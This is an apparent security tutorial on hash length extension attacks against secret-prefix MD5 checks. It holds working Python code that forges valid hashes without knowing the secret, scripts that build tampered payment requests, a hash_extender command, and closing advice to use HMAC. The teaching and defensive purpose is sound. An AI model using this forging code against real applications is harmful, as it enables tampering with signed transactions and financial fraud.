My attempt to explain a fun attack I recently learned about - no claim to anything new here!
Video of presentation at https://www.youtube.com/watch?v=3R_q5XD-RJU.
Thanks go to Soroush @irsdl.
2. Introduction
• An application uses this scheme as an integrity check:
hash($secret + $message)
// where + denotes concatenation
• Whenever the message is potentially subject to interference, the hash is sent alongside it
• The theory goes that any message tampering will be detected
• But this is potentially vulnerable to a “hash length extension attack” when all of these hold:
• Secret prefix
• Attacker knows message and hash
• Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384)
• Thanks to Soroush Dalili @irsdl
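To make the scheme concrete, here is a minimal sketch of the secret-prefix check described above. The secret value and the function names `sign` and `verify` are made up for illustration; MD5 is used only because it is the algorithm the later slides work with.

```python
import hashlib

SECRET = b"SUPERSECRET"  # hypothetical server-side secret


def sign(message: bytes) -> str:
    """Secret-prefix integrity check: hash(secret + message)."""
    return hashlib.md5(SECRET + message).hexdigest()


def verify(message: bytes, tag: str) -> bool:
    """Recompute the hash and compare it with the one sent alongside."""
    return sign(message) == tag


tag = sign(b"1234widget145.20")
print(verify(b"1234widget145.20", tag))  # True: untouched message
print(verify(b"1234widget0.99", tag))    # False: naive tampering is caught
```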
3. What makes a hash vulnerable?
• The hash algorithm chews on the input
• At the end, the internal state of the hash algorithm is the hash it spits out
• We can set the internal state of the hash algorithm to start from this point
• We can then feed in more input
• We now have a hash for a longer message that starts with the original input
• It doesn’t matter if the input began with a secret, we don’t need to know it
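The steps above can be sketched in code. Python's `hashlib` does not let you set the internal state, so this sketch carries its own small MD5 (following the RFC 1321 description) and checks it against `hashlib`. The names `md5`, `md5_padding` and `extend` are my own, and the secret appears only so the result can be verified; the attack itself uses just the known hash and the total length of secret plus message.

```python
import hashlib
import math
import struct

# Per-round shift amounts and sine-derived constants from RFC 1321.
SHIFTS = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
INITIAL_STATE = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
MASK = 0xFFFFFFFF


def rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def compress(state, block):
    """Mix one 64-byte block into the four-word internal state."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + m[g]) & MASK
        a, d, c, b = d, c, b, (b + rotl(f, SHIFTS[i])) & MASK
    return tuple((x + y) & MASK for x, y in zip(state, (a, b, c, d)))


def md5_padding(length):
    """PADDING + LENGTH that MD5 appends to a message of `length` bytes."""
    zeros = (55 - length) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", length * 8)


def md5(data, state=INITIAL_STATE, already_hashed=0):
    """MD5 of data, optionally resuming from `state` after `already_hashed` bytes."""
    data += md5_padding(already_hashed + len(data))
    for offset in range(0, len(data), 64):
        state = compress(state, data[offset:offset + 64])
    return struct.pack("<4I", *state)


def extend(known_digest, known_length, append):
    """Return (glue, digest) such that digest == MD5(original + glue + append)."""
    glue = md5_padding(known_length)
    state = struct.unpack("<4I", known_digest)  # the hash is the internal state
    return glue, md5(append, state, known_length + len(glue))


secret, message = b"SUPERSECRET", b"1234widget145.20"  # secret used only to check
known = hashlib.md5(secret + message).digest()
glue, forged = extend(known, len(secret + message), b"0.99")

assert md5(b"abc") == hashlib.md5(b"abc").digest()
assert forged == hashlib.md5(secret + message + glue + b"0.99").digest()
print(forged.hex())
```

Note that `extend` never sees the secret, only its length. In a real test that length is usually guessed by trying a range of values.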
4. Exploitation
• Sounds great, doesn’t it?
POST /transfer HTTP/1.1
account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233
// where hash = MD5("SECRET1020304090807060100")
• So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash
• This will “validate”:
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
// where hash = MD5("SECRET10203040908070601000")
• Unfortunately it’s not that simple
5. Deep dive
• MD5 is a block-based algorithm
• Padding is used to prepare the input before it’s digested
• Different algorithms use different schemes
• Take a message M
• The input that MD5 works on is:
M + PADDING + LENGTH_OF_M
• This will be some whole number of blocks in length
• What does that mean for our attack?
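As a rough illustration of the padding rule for MD5 (a 0x80 byte, then null bytes, then the message length in bits as a little-endian 8-byte field), the sketch below builds PADDING + LENGTH for a few message sizes and shows that the total always lands on a 64-byte block boundary. The helper name `md5_padding` is my own.

```python
import struct

BLOCK = 64  # MD5 block size in bytes


def md5_padding(message_len: int) -> bytes:
    """PADDING + LENGTH for a message of message_len bytes."""
    zeros = (55 - message_len) % BLOCK  # leave room for 0x80 and the 8-byte length
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", message_len * 8)


for n in (0, 26, 55, 56, 64):
    padded = n + len(md5_padding(n))
    print(n, padded)
# prints:
# 0 64
# 26 64
# 55 64
# 56 128
# 64 128
```

A 56-byte message spills into a second block because there is no longer room for the 0x80 byte plus the 8-byte length in the first one.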
6. What’s really going on
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
• We’d like hash = MD5("SECRET10203040908070601000")
• When we run our hash length extension attack, the input to the hash is really:
"SECRET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH
• The “message” we have a valid hash for is:
"SECRET1020304090807060100" + PADDING + LENGTH + "0"
• The app is checking hash($secret + $account_from + $account_to + $amount)
• We need to preserve account_from=10203040&account_to=90807060
• So that leaves amount="100" + PADDING + LENGTH + "0"
• The first PADDING + LENGTH was originally “metadata”: it’s now part of the data
• The crafted input isn’t tolerated in context
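To see why the crafted input isn't tolerated, here is a small sketch of what the amount field ends up containing. The secret length (7 bytes) and the digits-only `parse_amount` check are assumptions for illustration; a real app may validate differently.

```python
import struct


def md5_padding(message_len: int) -> bytes:
    """PADDING + LENGTH that MD5 appends to a message of message_len bytes."""
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", message_len * 8)


secret_len = 7  # assumption: the attacker has guessed the secret length
signed_fields = b"10203040" + b"90807060" + b"100"
glue = md5_padding(secret_len + len(signed_fields))

# The only place the old PADDING + LENGTH can go is inside the amount.
forged_amount = b"100" + glue + b"0"


def parse_amount(raw: bytes) -> int:
    """Hypothetical server-side validation: digits only."""
    if not raw.isdigit():
        raise ValueError("amount is not numeric")
    return int(raw)


print(parse_amount(b"1000"))
try:
    parse_amount(forged_amount)
except ValueError as err:
    print("rejected:", err)
```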
7. Demo
• That’s not to say it can never work
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd740683e182f0
// where hash = MD5($secret + $seller_id + $reference + $amount)
= MD5($secret + "1234widget145.20")
// internally, MD5 digests $secret + "1234widget145.20" + PADDING + LENGTH
• So what about
seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6d69a7fdf27744bd55cfdfc9fdb4
= MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99")
• This will work if the app accepts the weird reference value
• https://github.com/iagox86/hash_extender
./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 --append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
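Because the secret length is unknown, the attacker ends up with one candidate request per guessed length. The sketch below builds those candidates for lengths 8 to 12, URL-encoding the non-printable bytes in the reference value. It is not hash_extender's code, and the helper name `md5_padding` is my own; the forged hash is the one quoted on the slide.

```python
import struct
from urllib.parse import quote_from_bytes


def md5_padding(message_len: int) -> bytes:
    """PADDING + LENGTH that MD5 appends to a message of message_len bytes."""
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", message_len * 8)


data = b"1234widget145.20"                     # seller_id + reference + amount
new_hash = "398e6d69a7fdf27744bd55cfdfc9fdb4"  # forged hash from the slide

candidates = []
for secret_len in range(8, 13):                # matches --secret-min 8 --secret-max 12
    glue = md5_padding(secret_len + len(data))
    # seller_id keeps "1234", so the rest of the old data plus the glue
    # has to ride along in the reference parameter.
    reference = quote_from_bytes(b"widget145.20" + glue)
    query = f"seller_id=1234&reference={reference}&amount=0.99&hash={new_hash}"
    candidates.append((secret_len, glue, query))
    print(secret_len, len(glue), query)
```

Each candidate is sent in turn; the one built with the right secret length is the one that validates.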
8. Final Thoughts
• Not always exploitable – but when it is, impact can be high
• Tricky to find in a pure black box test
• If the hash scheme used a delimiter, the attack would still work
• Just makes it harder to find – need to know delimiter as well
• But it would stop a simpler attack:
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd740683e182f0
seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd740683e182f0
• Secret suffix is vulnerable due to collisions
• https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
• We’ve already solved the MAC problem
• “Length Extension Attacks” Burp App – not tested
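A short sketch of two of the points above: the simpler attack that works when fields are concatenated with no delimiter, and an HMAC-based replacement. The secret, the `|` delimiter and the function names are assumptions for illustration, and the delimiter only helps if field values cannot contain it.

```python
import hashlib
import hmac

SECRET = b"SUPERSECRET"  # hypothetical key


def weak_tag(seller_id: bytes, reference: bytes, amount: bytes) -> str:
    """The scheme from the slides: MD5(secret + fields), no delimiter."""
    return hashlib.md5(SECRET + seller_id + reference + amount).hexdigest()


def hmac_tag(seller_id: bytes, reference: bytes, amount: bytes) -> str:
    """HMAC over delimited fields; not open to length extension."""
    message = b"|".join([seller_id, reference, amount])
    return hmac.new(SECRET, message, hashlib.sha256).hexdigest()


def hmac_verify(seller_id: bytes, reference: bytes, amount: bytes, tag: str) -> bool:
    """Constant-time comparison of the expected and supplied tags."""
    return hmac.compare_digest(hmac_tag(seller_id, reference, amount), tag)


# Moving the "1" from the amount into the reference keeps the old hash valid.
print(weak_tag(b"1234", b"widget", b"145.20") == weak_tag(b"1234", b"widget1", b"45.20"))  # True
print(hmac_tag(b"1234", b"widget", b"145.20") == hmac_tag(b"1234", b"widget1", b"45.20"))  # False
```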
For MD5:
PADDING is a 0x80 byte followed by null bytes
LENGTH is the message length in bits, in a little-endian 8-byte field
PADDING and LENGTH are not necessarily printable bytes and make no sense in the context of the app
Output of hash_extender is ASCII hex of $data + PADDING + LENGTH + $append
PADDING starts 0x800000…
LENGTH is length($secret + $data) in bits (“SUPERSECRET1234widget145.20” = 27 bytes = 216 bits = 0xD8)
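hash_extender needs the “data” parameter so it knows how much PADDING to tack on and what LENGTH value to write (technically just the length of the data would do, but the output includes the data itself)
Output differs with the length of the secret: a longer secret means shorter PADDING and a larger LENGTH value. The “new signature”, i.e. the new hash, is the same each time, because we’re winding on the hash from the same start point (the given hash) with the same data appended. That holds here because every secret length from 8 to 12 pads out to the same single 64-byte block.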
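The arithmetic in these notes can be checked with a few lines. This sketch rebuilds PADDING and LENGTH for the 27-byte “SUPERSECRET1234widget145.20” case and prints the hex of $data + PADDING + LENGTH + $append, following the output format described above; it is not hash_extender itself.

```python
import struct

secret, data, append = b"SUPERSECRET", b"1234widget145.20", b"0.99"

total = len(secret) + len(data)                    # bytes hashed originally
padding = b"\x80" + b"\x00" * ((55 - total) % 64)  # 0x80 then null bytes
length = struct.pack("<Q", total * 8)              # bit count, little-endian, 8 bytes

print(total, total * 8, hex(total * 8))  # 27 216 0xd8
print(length.hex())                      # d800000000000000
print(padding.hex())
print((data + padding + length + append).hex())
```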